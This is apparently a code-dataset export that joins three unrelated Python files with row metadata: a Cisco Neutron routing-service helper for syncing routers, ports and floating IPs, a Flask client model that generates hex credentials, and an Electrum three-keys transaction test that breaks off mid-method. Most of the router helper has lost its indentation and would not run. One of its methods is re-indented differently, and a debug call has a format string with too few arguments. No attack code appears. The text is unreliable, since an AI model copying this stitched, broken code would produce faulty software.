for router in routers:
hd_routermapping[router['hosting_device']['id']].append(router)
# call cfg cleanup specific to device type from its driver
for hd_id, routers in six.iteritems(hd_routermapping):
temp_res = {"id": hd_id,
"hosting_device": routers[0]['hosting_device'],
"router_type": routers[0]['router_type']}
driver = self.driver_manager.set_driver(temp_res)
driver.cleanup_invalid_cfg(
routers[0]['hosting_device'], routers)
def _fetch_router_info(self, router_ids=None, device_ids=None,
all_routers=False):
"""Fetch router dict from the routing plugin.
:param router_ids: List of router_ids of routers to fetch
:param device_ids: List of device_ids whose routers to fetch
:param all_routers: If True fetch all the routers for this agent.
:return: List of router dicts of format:
[ {router_dict1}, {router_dict2},.....]
"""
try:
if all_routers:
router_ids = self.plugin_rpc.get_router_ids(self.context)
return self._fetch_router_chunk_data(router_ids)
if router_ids:
return self._fetch_router_chunk_data(router_ids)
if device_ids:
return self.plugin_rpc.get_routers(self.context,
hd_ids=device_ids)
except oslo_messaging.MessagingTimeout:
if self.sync_routers_chunk_size > SYNC_ROUTERS_MIN_CHUNK_SIZE:
self.sync_routers_chunk_size = max(
self.sync_routers_chunk_size / 2,
SYNC_ROUTERS_MIN_CHUNK_SIZE)
LOG.error(_LE('Server failed to return info for routers in '
'required time, decreasing chunk size to: %s'),
self.sync_routers_chunk_size)
else:
LOG.error(_LE('Server failed to return info for routers in '
'required time even with min chunk size: %s. '
'It might be under very high load or '
'just inoperable'),
self.sync_routers_chunk_size)
raise
except oslo_messaging.MessagingException:
LOG.exception(_LE("RPC Error in fetching routers from plugin"))
raise n_exc.AbortSyncRouters()
self.fullsync = True
LOG.debug("Periodic_sync_routers_task successfully completed")
# adjust chunk size after successful sync
if self.sync_routers_chunk_size < SYNC_ROUTERS_MAX_CHUNK_SIZE:
self.sync_routers_chunk_size = min(
self.sync_routers_chunk_size + SYNC_ROUTERS_MIN_CHUNK_SIZE,
SYNC_ROUTERS_MAX_CHUNK_SIZE)
def _fetch_router_chunk_data(self, router_ids=None):
"""Fetch router data from the routing plugin in chunks.
:param router_ids: List of router_ids of routers to fetch
:return: List of router dicts of format:
[ {router_dict1}, {router_dict2},.....]
"""
curr_router = []
if len(router_ids) > self.sync_routers_chunk_size:
# fetch routers by chunks to reduce the load on server and
# to start router processing earlier
for i in range(0, len(router_ids),
self.sync_routers_chunk_size):
routers = self.plugin_rpc.get_routers(
self.context, (router_ids[i:i +
self.sync_routers_chunk_size]))
LOG.debug('Processing :%r', routers)
for r in routers:
curr_router.append(r)
else:
curr_router = self.plugin_rpc.get_routers(
self.context, router_ids=router_ids)
return curr_router
def _handle_sync_devices(self, routers):
"""
Handles routers during a device_sync.
This method performs post-processing on routers fetched from the
routing plugin during a device sync. Routers are first fetched
from the plugin based on the list of device_ids. Since fetched
routers take precedence over pending work, matching router-ids
buffered in update_routers and removed_routers are discarded.
The existing router cache is also cleared in order to properly
trigger updates and deletes. Lastly, invalid configuration in
the underlying hosting-device is deleted via _cleanup_invalid_cfg.
Modifies updated_routers, removed_routers, and sync_devices
attributes
:param routers: working list of routers as populated in
process_services
"""
sync_devices_list = list(self.sync_devices)
LOG.debug("Fetching routers on:%s", sync_devices_list)
fetched_routers = self._fetch_router_info(device_ids=sync_devices_list)
if fetched_routers:
LOG.debug("[sync_devices] Fetched routers :%s",
pp.pformat(fetched_routers))
# clear router_config cache
for router_dict in fetched_routers:
self.updated_routers.discard(router_dict['id'])
self.removed_routers.discard(router_dict['id'])
LOG.debug("[sync_devices] invoking "
"_router_removed(%s)",
router_dict['id'])
self._router_removed(router_dict['id'],
deconfigure=False)
self._cleanup_invalid_cfg(fetched_routers)
routers.extend(fetched_routers)
self.sync_devices.clear()
LOG.debug("[sync_devices] %s finished",
sync_devices_list)
else:
# If the initial attempt to sync a device
# failed, retry again (by not clearing sync_devices)
# Normal updated_routers processing is still allowed
# to happen
self.sync_devices_attempts += 1
if (self.sync_devices_attempts >=
cfg.CONF.cfg_agent.max_device_sync_attempts):
LOG.debug("Max number [%d / %d ] of sync_devices "
"attempted. No further retries will "
"be attempted." %
(self.sync_devices_attempts,
cfg.CONF.cfg_agent.max_device_sync_attempts))
self.sync_devices.clear()
self.sync_devices_attempts = 0
else:
LOG.debug("Fetched routers was blank for sync attempt "
"[%d / %d], will attempt resync of %s devices "
"again in the next iteration" %
(self.sync_devices_attempts,
cfg.CONF.cfg_agent.max_device_sync_attempts,
pp.pformat(self.sync_devices)))
@staticmethod
def _get_router_ids_from_removed_devices_info(removed_devices_info):
"""Extract router_ids from the removed devices info dict.
:param removed_devices_info: Dict of removed devices and their
associated resources.
Format:
{
'hosting_data': {'hd_id1': {'routers': [id1, id2, ...]},
'hd_id2': {'routers': [id3, id4, ...]},
...
},
'deconfigure': True/False
}
:return removed_router_ids: List of removed router ids
"""
removed_router_ids = []
for hd_id, resources in removed_devices_info['hosting_data'].items():
removed_router_ids += resources.get('routers', [])
return removed_router_ids
@staticmethod
def _sort_resources_per_hosting_device(resources):
"""This function will sort the resources on hosting device.
The sorting on hosting device is done by looking up the
`hosting_device` attribute of the resource, and its `id`.
:param resources: a dict with key of resource name
:return dict sorted on the hosting device of input resource. Format:
hosting_devices = {
'hd_id1' : {'routers':[routers],
'removed_routers':[routers], .... }
'hd_id2' : {'routers':[routers], .. }
.......
}
"""
hosting_devices = {}
for key in resources.keys():
for r in resources.get(key) or []:
if r.get('hosting_device') is None:
continue
hd_id = r['hosting_device']['id']
hosting_devices.setdefault(hd_id, {})
hosting_devices[hd_id].setdefault(key, []).append(r)
return hosting_devices
def _adjust_router_list_for_global_router(self, routers):
"""
Pushes 'Global' routers to the end of the router list, so that
deleting default route occurs before deletion of external nw subintf
"""
#ToDo(Hareesh): Simplify if possible
for r in routers:
if r[ROUTER_ROLE_ATTR] == c_constants.ROUTER_ROLE_GLOBAL:
LOG.debug("Global router:%s found. Moved to the end of list "
"for processing", r['id'])
routers.remove(r)
routers.append(r)
def _process_routers(self, routers, removed_routers,
device_id=None, all_routers=False):
"""Process the set of routers.
Iterating on the set of routers received and comparing it with the
set of routers already in the routing service helper, new routers
which are added are identified. Before processing check the
reachability (via ping) of hosting device where the router is hosted.
If device is not reachable it is backlogged.
For routers which are only updated, call `_process_router()` on them.
When all_routers is set to True (because of a full sync),
this will result in the detection and deletion of routers which
have been removed.
Whether the router can only be assigned to a particular hosting device
is decided and enforced by the plugin. No checks are done here.
:param routers: The set of routers to be processed
:param removed_routers: the set of routers which where removed
:param device_id: Id of the hosting device
:param all_routers: Flag for specifying a partial list of routers
:return: None
"""
try:
if all_routers:
prev_router_ids = set(self.router_info)
else:
prev_router_ids = set(self.router_info) & set(
[router['id'] for router in routers])
cur_router_ids = set()
deleted_routerids_list = []
for r in routers:
if not r['admin_state_up']:
continue
cur_router_ids.add(r['id'])
# identify list of routers(ids) that no longer exist
for router_id in prev_router_ids - cur_router_ids:
deleted_routerids_list.append(router_id)
if removed_routers:
self._adjust_router_list_for_global_router(removed_routers)
for router in removed_routers:
deleted_routerids_list.append(router['id'])
self._adjust_router_list_for_global_router(routers)
# First process create/updated routers
for r in routers:
LOG.debug("Processing router[id:%(id)s, role:%(role)s]",
{'id': r['id'], 'role': r[ROUTER_ROLE_ATTR]})
if r['id'] in deleted_routerids_list:
continue
if r['status'] == c_constants.ROUTER_INFO_INCOMPLETE:
# The plugin could not fill in all the info due to
# timing and db settling down. So put this router
# back in updated_routers, we will pull again on the
# sync time.
LOG.debug("Router: %(id)s INFO_INCOMPLETE",
{'id': r['id']})
self.updated_routers.add(r['id'])
continue
try:
if not r['admin_state_up']:
continue
cur_router_ids.add(r['id'])
hd = r['hosting_device']
if not self._dev_status.is_hosting_device_reachable(hd):
LOG.info(_LI("Router: %(id)s is on an unreachable "
"hosting device. "), {'id': r['id']})
continue
if r['id'] not in self.router_info:
self._router_added(r['id'], r)
ri = self.router_info[r['id']]
ri.router = r
self._process_router(ri)
except ncc_errors.SessionCloseError as e:
LOG.exception(
_LE("ncclient Unexpected session close %s"), e)
if not self._dev_status.is_hosting_device_reachable(
r['hosting_device']):
LOG.debug("Lost connectivity to Hosting Device %s" %
r['hosting_device']['id'])
# Will rely on heartbeat to detect hd state
# and schedule resync when hd comes back
else:
# retry the router update on the next pass
self.updated_routers.add(r['id'])
LOG.debug("RETRY_RTR_UPDATE %s" % (r['id']))
continue
except KeyError as e:
LOG.exception(_LE("Key Error, missing key: %s"), e)
self.updated_routers.add(r['id'])
continue
except cfg_exceptions.DriverException as e:
LOG.exception(_LE("Driver Exception on router:%(id)s. "
"Error is %(e)s"), {'id': r['id'],
'e': e})
self.updated_routers.update([r['id']])
continue
LOG.debug("Done processing router[id:%(id)s, role:%(role)s]",
{'id': r['id'], 'role': r[ROUTER_ROLE_ATTR]})
# Finally process removed routers
for router_id in deleted_routerids_list:
LOG.debug("Processing deleted router:%s", router_id)
self._router_removed(router_id)
except Exception:
LOG.exception(_LE("Exception in processing routers on device:%s"),
device_id)
self.sync_devices.add(device_id)
def _send_update_port_statuses(self, port_ids, status):
"""Sends update notifications to set the operational status of the
list of router ports provided. To make each notification doesn't exceed
the RPC length, each message contains a maximum of MAX_PORTS_IN_BATCH
port ids.
:param port_ids: List of ports to update the status
:param status: operational status to update
(ex: bc.constants.PORT_STATUS_ACTIVE)
"""
if not port_ids:
return
MAX_PORTS_IN_BATCH = 50
list_chunks_ports = [port_ids[i:i + MAX_PORTS_IN_BATCH]
for i in six.moves.range(0, len(port_ids), MAX_PORTS_IN_BATCH)]
for chunk_ports in list_chunks_ports:
self.plugin_rpc.send_update_port_statuses(self.context,
chunk_ports, status)
def _get_internal_port_changes(self, ri, internal_ports):
existing_port_ids = set([p['id'] for p in ri.internal_ports])
current_port_ids = set([p['id'] for p in internal_ports
if p['admin_state_up']])
new_ports = [p for p in internal_ports
if
p['id'] in (current_port_ids - existing_port_ids)]
old_ports = [p for p in ri.internal_ports
if p['id'] not in current_port_ids]
new_port_ids = [p['id'] for p in new_ports]
old_port_ids = [p['id'] for p in old_ports]
LOG.debug("++ new_port_ids = %s" % (pp.pformat(new_port_ids)))
LOG.debug("++ old_port_ids = %s" % (pp.pformat(old_port_ids)))
return new_ports, old_ports
def _enable_disable_ports(self, ri, ex_gw_port, internal_ports):
if not ri.router['admin_state_up']:
self._disable_router_interface(ri)
else:
if ex_gw_port:
if not ex_gw_port['admin_state_up']:
self._disable_router_interface(ri, ex_gw_port)
else:
self._enable_router_interface(ri, ex_gw_port)
for port in internal_ports:
if not port['admin_state_up']:
self._disable_router_interface(ri, port)
else:
self._enable_router_interface(ri, port)
def _process_new_ports(self, ri, new_ports, ex_gw_port, list_port_ids_up):
#TODO(bmelande): 1. We need to handle the case where an external
# network, to which a global router is connected,
# is given another subnet. The global router must
# then attached to that subnet. That attachment
# does NOT result in a new router port. Instead, it
# is done as an update to an EXISTING router port
# which gets another ip address (from the newly
# added subnet.
for p in new_ports:
# We sort the port's subnets on subnet_id so we can be sure that
# the same ip address is used as primary on the HA master router
# as well as on all HA backup routers.
port_subnets = sorted(p['subnets'], key=itemgetter('id'))
num_subnets_on_port = len(port_subnets)
LOG.debug("Number of subnets associated with router port = %d" %
num_subnets_on_port)
if (ri.router[ROUTER_ROLE_ATTR] is None and
num_subnets_on_port > 1):
LOG.error(_LE("Ignoring router port with multiple IPv4 "
"subnets associated"))
raise MultipleIPv4SubnetsException(
port_id=p['id'], subnets=pp.pformat(port_subnets))
# Configure the primary IP address
self._set_subnet_info(p, port_subnets[0]['id'])
self._internal_network_added(ri, p, ex_gw_port)
# Process the secondary subnets. Only router ports of global
# routers can have multiple ipv4 subnets since we connect such
# routers to external networks using regular router ports.
for p_sn in port_subnets[1:]:
self._set_subnet_info(p, p_sn['id'], is_primary=False)
self._internal_network_added(ri, p, ex_gw_port)
ri.internal_ports.append(p)
list_port_ids_up.append(p['id'])
def _process_old_ports(self, ri, old_ports, ex_gw_port):
for p in old_ports:
self._internal_network_removed(ri, p, ri.ex_gw_port)
ri.internal_ports.remove(p)
def _process_gateway_set(self, ri, ex_gw_port, list_port_ids_up):
# We sort the port's subnets on subnet_id so we can be sure that
# the same ip address is used as primary on the HA master router
# as well as on all HA backup routers.
gw_port_subnets = sorted(ex_gw_port['subnets'], key=itemgetter('id'))
# Configure the primary IP address
self._set_subnet_info(ex_gw_port, gw_port_subnets[0]['id'])
self._external_gateway_added(ri, ex_gw_port)
# Process the secondary subnets
for gw_p_sn in gw_port_subnets[1:]:
self._set_subnet_info(ex_gw_port, gw_p_sn['id'], is_primary=False)
self._external_gateway_added(ri, ex_gw_port)
list_port_ids_up.append(ex_gw_port['id'])
def _process_gateway_cleared(self, ri, ex_gw_port):
# We sort the port's subnets on subnet_id so we can be sure that
# the same ip address is used as primary on the HA master router
# as well as on all HA backup routers.
gw_port_subnets = sorted(ex_gw_port['subnets'], key=itemgetter('id'))
# Deconfigure the primary IP address
self._set_subnet_info(ex_gw_port, gw_port_subnets[0]['id'])
self._external_gateway_removed(ri, ex_gw_port)
# Process the secondary subnets
for gw_p_sn in gw_port_subnets[1:]:
self._set_subnet_info(ex_gw_port, gw_p_sn['id'], is_primary=False)
self._external_gateway_removed(ri, ex_gw_port)
def _add_rid_to_vrf_list(self, ri):
# not needed in base service helper
pass
def _remove_rid_from_vrf_list(self, ri):
# not needed in base service helper
pass
def _process_router(self, ri):
"""Process a router, apply latest configuration and update router_info.
Get the router dict from RouterInfo and proceed to detect changes
from the last known state. When new ports or deleted ports are
detected, `internal_network_added()` or `internal_networks_removed()`
are called accordingly. Similarly changes in ex_gw_port causes
`external_gateway_added()` or `external_gateway_removed()` calls.
Next, floating_ips and routes are processed. Also, latest state is
stored in ri.internal_ports and ri.ex_gw_port for future comparisons.
:param ri : RouterInfo object of the router being processed.
:return:None
:raises: networking_cisco.plugins.cisco.cfg_agent.cfg_exceptions.
DriverException if the configuration operation fails.
"""
try:
ex_gw_port = ri.router.get('gw_port')
ri.ha_info = ri.router.get('ha_info', None)
gateway_set = ex_gw_port and not ri.ex_gw_port
gateway_cleared = not ex_gw_port and ri.ex_gw_port
internal_ports = ri.router.get(bc.constants.INTERFACE_KEY, [])
# Once the gateway is set, then we know which VRF
# this router belongs to. Keep track of it in our
# lists of routers, organized as a dictionary by
# VRF name
if gateway_set:
self._add_rid_to_vrf_list(ri)
new_ports, old_ports = self._get_internal_port_changes(
ri, internal_ports)
list_port_ids_up = []
self._process_new_ports(ri, new_ports,
ex_gw_port, list_port_ids_up)
self._process_old_ports(ri, old_ports, ex_gw_port)
if gateway_set:
self._process_gateway_set(ri, ex_gw_port,
list_port_ids_up)
elif gateway_cleared:
self._process_gateway_cleared(ri, ri.ex_gw_port)
self._send_update_port_statuses(list_port_ids_up,
bc.constants.PORT_STATUS_ACTIVE)
if ex_gw_port:
self._process_router_floating_ips(ri, ex_gw_port)
if ri.router[ROUTER_ROLE_ATTR] not in \
[c_constants.ROUTER_ROLE_GLOBAL,
c_constants.ROUTER_ROLE_LOGICAL_GLOBAL]:
self._enable_disable_ports(ri, ex_gw_port, internal_ports)
if gateway_cleared:
# Remove this router from the list of routers by VRF
self._remove_rid_from_vrf_list(ri)
ri.ex_gw_port = ex_gw_port
self._routes_updated(ri)
except cfg_exceptions.HAParamsMissingException as e:
self.updated_routers.update([ri.router_id])
LOG.warning(e)
except cfg_exceptions.DriverException as e:
with excutils.save_and_reraise_exception():
self.updated_routers.update([ri.router_id])
LOG.error(e)
    def _process_router_floating_ips(self, ri, ex_gw_port):
        """Process a router's floating ips.

        Compare floatingips configured in device (i.e., those fips in
        the ri.floating_ips "cache") with the router's updated floating ips
        (in ri.router.floating_ips) and determine floating_ips which were
        added or removed. Notify driver of the change via
        `floating_ip_added()` or `floating_ip_removed()`. Also update plugin
        with status of fips.

        :param ri: RouterInfo object of the router being processed.
        :param ex_gw_port: Port dict of the external gateway port.
        :return: None
        :raises: networking_cisco.plugins.cisco.cfg_agent.cfg_exceptions.
            DriverException if the configuration operation fails.
        """
        # fips that exist in neutron db (i.e., the desired "truth")
        current_fips = ri.router.get(bc.constants.FLOATINGIP_KEY, [])
        # ids of fips that exist in neutron db
        current_fip_ids = {fip['id'] for fip in current_fips}
        # ids of fips that are configured in device
        configured_fip_ids = {fip['id'] for fip in ri.floating_ips}
        id_to_current_fip_map = {}
        fips_to_add = []
        # iterate over fips that exist in neutron db
        for configured_fip in current_fips:
            if configured_fip['port_id']:
                # store to later check if this fip has been remapped
                id_to_current_fip_map[configured_fip['id']] = configured_fip
                if configured_fip['id'] not in configured_fip_ids:
                    # Ensure that we add only after remove, in case same
                    # fixed_ip is mapped to different floating_ip within
                    # the same loop cycle. If add occurs before first,
                    # cfg will fail because of existing entry with
                    # identical fixed_ip
                    fips_to_add.append(configured_fip)
        # fips configured on the device but no longer in neutron db
        fip_ids_to_remove = configured_fip_ids - current_fip_ids
        LOG.debug("fip_ids_to_add: %s" % fips_to_add)
        LOG.debug("fip_ids_to_remove: %s" % fip_ids_to_remove)
        fips_to_remove = []
        fip_statuses = {}
        # iterate over fips that are configured in device
        for configured_fip in ri.floating_ips:
            if configured_fip['id'] in fip_ids_to_remove:
                fips_to_remove.append(configured_fip)
                self._floating_ip_removed(
                    ri, ri.ex_gw_port, configured_fip['floating_ip_address'],
                    configured_fip['fixed_ip_address'])
                fip_statuses[configured_fip['id']] = (
                    bc.constants.FLOATINGIP_STATUS_DOWN)
                LOG.debug("Add to fip_statuses DOWN id:%s fl_ip:%s fx_ip:%s",
                          configured_fip['id'],
                          configured_fip['floating_ip_address'],
                          configured_fip['fixed_ip_address'])
            else:
                # handle possibly required remapping of a fip
                # ip address that fip currently is configured for
                configured_fixed_ip = configured_fip['fixed_ip_address']
                new_fip = id_to_current_fip_map[configured_fip['id']]
                # ip address that fip should be configured for
                current_fixed_ip = new_fip['fixed_ip_address']
                if (current_fixed_ip and configured_fixed_ip and
                        current_fixed_ip != configured_fixed_ip):
                    # fip was remapped to a different fixed ip:
                    # remove the old mapping, then re-add the new one below
                    floating_ip = configured_fip['floating_ip_address']
                    self._floating_ip_removed(ri, ri.ex_gw_port,
                                              floating_ip, configured_fixed_ip)
                    fip_statuses[configured_fip['id']] = (
                        bc.constants.FLOATINGIP_STATUS_DOWN)
                    fips_to_remove.append(configured_fip)
                    fips_to_add.append(new_fip)
        for configured_fip in fips_to_remove:
            # remove fip from "cache" of fips configured in device
            ri.floating_ips.remove(configured_fip)
        for configured_fip in fips_to_add:
            self._floating_ip_added(ri, ex_gw_port,
                                    configured_fip['floating_ip_address'],
                                    configured_fip['fixed_ip_address'])
            # add fip to "cache" of fips configured in device
            ri.floating_ips.append(configured_fip)
            fip_statuses[configured_fip['id']] = (
                bc.constants.FLOATINGIP_STATUS_ACTIVE)
            LOG.debug("Add to fip_statuses ACTIVE id:%s fl_ip:%s fx_ip:%s",
                      configured_fip['id'],
                      configured_fip['floating_ip_address'],
                      configured_fip['fixed_ip_address'])
        if fip_statuses:
            # push the resulting fip states back to the plugin in one call
            LOG.debug("Sending floatingip_statuses_update: %s", fip_statuses)
            self.plugin_rpc.update_floatingip_statuses(
                self.context, ri.router_id, fip_statuses)
def _router_added(self, router_id, router):
"""Operations when a router is added.
Create a new RouterInfo object for this router and add it to the
service helpers router_info dictionary. Then `router_added()` is
called on the device driver.
:param router_id: id of the router
:param router: router dict
:return: None
"""
ri = RouterInfo(router_id, router)
driver = self.driver_manager.set_driver(router)
if router[ROUTER_ROLE_ATTR] in [
c_constants.ROUTER_ROLE_GLOBAL,
c_constants.ROUTER_ROLE_LOGICAL_GLOBAL]:
# No need to create a vrf for Global or logical global routers
LOG.debug("Skipping router_added device processing for %(id)s as "
"its role is %(role)s",
{'id': router_id, 'role': router[ROUTER_ROLE_ATTR]})
else:
driver.router_added(ri)
self.router_info[router_id] = ri
def _router_removed(self, router_id, deconfigure=True):
"""Operations when a router is removed.
Get the RouterInfo object corresponding to the router in the service
helpers's router_info dict. If deconfigure is set to True,
remove this router's configuration from the hosting device.
:param router_id: id of the router
:param deconfigure: if True, the router's configuration is deleted from
the hosting device.
:return: None
"""
ri = self.router_info.get(router_id)
if ri is None:
LOG.warning(_LW("Info for router %s was not found. "
"Skipping router removal"), router_id)
return
ri.router['gw_port'] = None
ri.router[bc.constants.INTERFACE_KEY] = []
ri.router[bc.constants.FLOATINGIP_KEY] = []
try:
hd = ri.router['hosting_device']
# We proceed to removing the configuration from the device
# only if (a) deconfigure is set to True (default)
# (b) the router's hosting device is reachable.
if (deconfigure and
self._dev_status.is_hosting_device_reachable(hd)):
self._process_router(ri)
driver = self.driver_manager.get_driver(router_id)
driver.router_removed(ri)
self.driver_manager.remove_driver(router_id)
del self.router_info[router_id]
self.removed_routers.discard(router_id)
except cfg_exceptions.DriverException:
LOG.warning(_LW("Router remove for router_id: %s was incomplete. "
"Adding the router to removed_routers list"),
router_id)
self.removed_routers.add(router_id)
# remove this router from updated_routers if it is there. It might
# end up there too if exception was thrown earlier inside
# `_process_router()`
self.updated_routers.discard(router_id)
except ncc_errors.SessionCloseError as e:
LOG.exception(_LE("ncclient Unexpected session close %s"
" while attempting to remove router"), e)
if not self._dev_status.is_hosting_device_reachable(hd):
LOG.debug("Lost connectivity to Hosting Device %s" % hd['id'])
# rely on heartbeat to detect HD state
# and schedule resync when the device comes back
else:
# retry the router removal on the next pass
self.removed_routers.add(router_id)
LOG.debug("Interim connectivity lost to hosting device %s, "
"enqueuing router %s in removed_routers set" %
pp.pformat(hd), router_id)
def _internal_network_added(self, ri, port, ex_gw_port):
driver = self.driver_manager.get_driver(ri.id)
driver.internal_network_added(ri, port)
if ri.snat_enabled and ex_gw_port:
driver.enable_internal_network_NAT(ri, port, ex_gw_port)
def _internal_network_removed(self, ri, port, ex_gw_port):
driver = self.driver_manager.get_driver(ri.id)
driver.internal_network_removed(ri, port)
if ri.snat_enabled and ex_gw_port:
#ToDo(Hareesh): Check if the intfc_deleted attribute is needed
driver.disable_internal_network_NAT(ri, port, ex_gw_port,
itfc_deleted=True)
def _external_gateway_added(self, ri, ex_gw_port):
driver = self.driver_manager.get_driver(ri.id)
driver.external_gateway_added(ri, ex_gw_port)
if ri.snat_enabled and ri.internal_ports:
for port in ri.internal_ports:
driver.enable_internal_network_NAT(ri, port, ex_gw_port)
def _external_gateway_removed(self, ri, ex_gw_port):
driver = self.driver_manager.get_driver(ri.id)
if ri.snat_enabled and ri.internal_ports:
for port in ri.internal_ports:
driver.disable_internal_network_NAT(ri, port, ex_gw_port)
driver.external_gateway_removed(ri, ex_gw_port)
def _floating_ip_added(self, ri, ex_gw_port, floating_ip, fixed_ip):
driver = self.driver_manager.get_driver(ri.id)
driver.floating_ip_added(ri, ex_gw_port, floating_ip, fixed_ip)
def _floating_ip_removed(self, ri, ex_gw_port, floating_ip, fixed_ip):
driver = self.driver_manager.get_driver(ri.id)
driver.floating_ip_removed(ri, ex_gw_port, floating_ip, fixed_ip)
def _enable_router_interface(self, ri, port):
driver = self.driver_manager.get_driver(ri.id)
driver.enable_router_interface(ri, port)
def _disable_router_interface(self, ri, port=None):
driver = self.driver_manager.get_driver(ri.id)
driver.disable_router_interface(ri, port)
def _routes_updated(self, ri):
"""Update the state of routes in the router.
Compares the current routes with the (configured) existing routes
and detect what was removed or added. Then configure the
logical router in the hosting device accordingly.
:param ri: RouterInfo corresponding to the router.
:return: None
:raises: networking_cisco.plugins.cisco.cfg_agent.cfg_exceptions.
DriverException if the configuration operation fails.
"""
new_routes = ri.router['routes']
old_routes = ri.routes
adds, removes = bc.common_utils.diff_list_of_dict(old_routes,
new_routes)
for route in adds:
LOG.debug("Added route entry is '%s'", route)
# remove replaced route from deleted route
for del_route in removes:
if route['destination'] == del_route['destination']:
removes.remove(del_route)
driver = self.driver_manager.get_driver(ri.id)
driver.routes_updated(ri, 'replace', route)
for route in removes:
LOG.debug("Removed route entry is '%s'", route)
driver = self.driver_manager.get_driver(ri.id)
driver.routes_updated(ri, 'delete', route)
ri.routes = new_routes
@staticmethod
def _set_subnet_info(port, subnet_id, is_primary=True):
ip = next((i['ip_address'] for i in port['fixed_ips']
if i['subnet_id'] == subnet_id), None)
if ip is None:
raise IPAddressMissingException(port_id=port['id'],
subnet_id=subnet_id)
subnet = next(sn for sn in port['subnets'] if sn['id'] == subnet_id)
prefixlen = netaddr.IPNetwork(subnet['cidr']).prefixlen
port['ip_info'] = {'subnet_id': subnet_id, 'is_primary': is_primary,
'ip_cidr': "%s/%s" % (ip, prefixlen)}
| 14,360 | 32,425 | 280 |
e14c362ef033e9d01558bffaeb08648350895f3c | 995 | py | Python | src/models/client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | src/models/client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | src/models/client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | """
Define the Channel model
"""
from . import db
from .abc import BaseModel, MetaBaseModel
from binascii import hexlify
import os
KEY_LENGTH = 64
class Client(db.Model, BaseModel, metaclass=MetaBaseModel):
""" The Channel model """
__tablename__ = 'client'
slug = db.Column(db.String(300), primary_key=True)
title = db.Column(db.String(300), nullable=True)
client_id = db.Column(db.String(300), nullable=False)
client_secret = db.Column(db.String(300), nullable=False)
def __init__(self, slug, title, client_id=None, client_secret=None):
""" Create a new Client """
self.slug = slug
self.title = title
self.client_id = client_id
self.client_secret = client_secret
if not client_id:
self.client_id = self.randomHex()
if not client_secret:
self.client_secret = self.randomHex()
@staticmethod
| 27.638889 | 72 | 0.657286 | """
Define the Channel model
"""
from . import db
from .abc import BaseModel, MetaBaseModel
from binascii import hexlify
import os
KEY_LENGTH = 64
class Client(db.Model, BaseModel, metaclass=MetaBaseModel):
    """The Client model: an API client identified by slug, with generated
    client_id / client_secret credentials."""

    __tablename__ = 'client'

    slug = db.Column(db.String(300), primary_key=True)
    title = db.Column(db.String(300), nullable=True)
    client_id = db.Column(db.String(300), nullable=False)
    client_secret = db.Column(db.String(300), nullable=False)

    def __init__(self, slug, title, client_id=None, client_secret=None):
        """Create a new Client, generating any credential not supplied."""
        self.slug = slug
        self.title = title
        self.client_id = client_id
        self.client_secret = client_secret
        if not client_id:
            self.client_id = self.randomHex()
        if not client_secret:
            self.client_secret = self.randomHex()

    @staticmethod
    def randomHex():
        """Return a random hex token of 2 * KEY_LENGTH characters.

        BUG FIX: hexlify() returns bytes; decode so the db.String
        columns receive text rather than a bytes object.
        """
        return hexlify(os.urandom(KEY_LENGTH)).decode('ascii')
1c6561b063054a6ec52921b6fecd24fdbfbcb829 | 3,209 | py | Python | electrum/tests/test_three_keys_transaction.py | mgrychow/electrum-vault | a15b0fc5db4e83801cd7f1ba3defd56daa0b058a | [
"MIT"
] | 8 | 2020-03-18T21:55:38.000Z | 2021-03-01T12:54:47.000Z | electrum/tests/test_three_keys_transaction.py | mgrychow/electrum-vault | a15b0fc5db4e83801cd7f1ba3defd56daa0b058a | [
"MIT"
] | 6 | 2020-07-10T13:17:21.000Z | 2021-04-26T11:47:22.000Z | electrum/tests/test_three_keys_transaction.py | mgrychow/electrum-vault | a15b0fc5db4e83801cd7f1ba3defd56daa0b058a | [
"MIT"
] | 8 | 2020-05-10T11:04:15.000Z | 2021-05-06T14:51:46.000Z | from collections import namedtuple
from typing import List
from unittest import TestCase
from electrum import Transaction
from electrum.three_keys.multikey_generator import MultiKeyScriptGenerator
from electrum.three_keys.transaction import ThreeKeysTransaction, TxType
TX = '0200000001eaa85f4446a8d48b345592b7bc540678ef1e0f4a80b4893e9bedbf9aae636d9400000000280000255121023765a77db702ab87d5cf6431d81a4734d9a636eb95446ffe01fa06ac190ce56c51aefdffffff02008c86470000000017a9142664929e5ed5356477dad1404f51bb507e89f9aa87b0398ecb0300000017a914a2703755a1b5e5aa06e742f3db127628d6ed40cd876c030000'
| 38.202381 | 317 | 0.714241 | from collections import namedtuple
from typing import List
from unittest import TestCase
from electrum import Transaction
from electrum.three_keys.multikey_generator import MultiKeyScriptGenerator
from electrum.three_keys.transaction import ThreeKeysTransaction, TxType
TX = '0200000001eaa85f4446a8d48b345592b7bc540678ef1e0f4a80b4893e9bedbf9aae636d9400000000280000255121023765a77db702ab87d5cf6431d81a4734d9a636eb95446ffe01fa06ac190ce56c51aefdffffff02008c86470000000017a9142664929e5ed5356477dad1404f51bb507e89f9aa87b0398ecb0300000017a914a2703755a1b5e5aa06e742f3db127628d6ed40cd876c030000'
class DummyGenerator(MultiKeyScriptGenerator):
    """Minimal no-op MultiKeyScriptGenerator, used only to exercise the
    multisig_script_generator property in the tests below."""
    def get_redeem_script(self, public_keys: List[str]) -> str:
        # Intentionally a no-op (returns None); the tests never call it.
        pass
    def get_script_sig(self, signatures: List[str], public_keys: List[str]) -> str:
        # Intentionally a no-op (returns None); the tests never call it.
        pass
class Test3KeysTransaction(TestCase):
    """Tests for attaching a MultiKeyScriptGenerator to a Transaction and
    for ThreeKeysTransaction construction and serialization."""
    def test_setting_multisig_generator(self):
        # A proper generator instance is accepted and stored as-is.
        tr = Transaction(None)
        generator = DummyGenerator()
        tr.multisig_script_generator = generator
        self.assertTrue(generator is tr.multisig_script_generator)
    def test_failed_multisig_setting(self):
        # Anything that is not a MultiKeyScriptGenerator must be rejected.
        Gen = namedtuple('Gen', ['a', 'b'])
        generator = Gen(1, 1)
        tr = Transaction(None)
        with self.assertRaises(TypeError) as error:
            tr.multisig_script_generator = generator
        self.assertEqual(
            'Cannot set multisig_script_generator. It has to be MultisigScriptGenerator',
            str(error.exception)
        )
    def test_tx_type_setting(self):
        # tx_type must be a TxType member, not an arbitrary string.
        tx = ThreeKeysTransaction(None, TxType.ALERT_PENDING)
